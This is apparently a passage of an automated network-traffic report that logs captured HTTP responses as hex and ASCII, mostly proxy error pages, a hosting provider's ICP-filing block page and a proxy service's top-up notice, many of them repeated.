0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:48 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:48 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:14:48 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:48 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:48 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service Unavailablex-envoy-overloaded: truecontent-length: 81content-type: text/plaindate: Sat, 09 Mar 2024 11:54:38 GMTserver: svcproxyconnection: closeData Raw: 75 70 73 74 72 65 61 6d 20 63 6f 6e 6e 65 63 74 20 65 72 72 6f 72 20 6f 72 20 64 69 73 63 6f 6e 6e 65 63 74 2f 72 65 73 65 74 20 62 65 66 6f 72 65 20 68 65 61 64 65 72 73 2e 20 72 65 73 65 74 20 72 65 61 73 6f 6e 3a 20 6f 76 65 72 66 6c 6f 77 Data Ascii: upstream connect error or disconnect/reset before headers. reset reason: overflow
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:49 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:49 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:49 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:50 GMTContent-Type: text/html;charset=utf-8Content-Length: 3978X-Squid-Error: ERR_CANNOT_FORWARD 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20
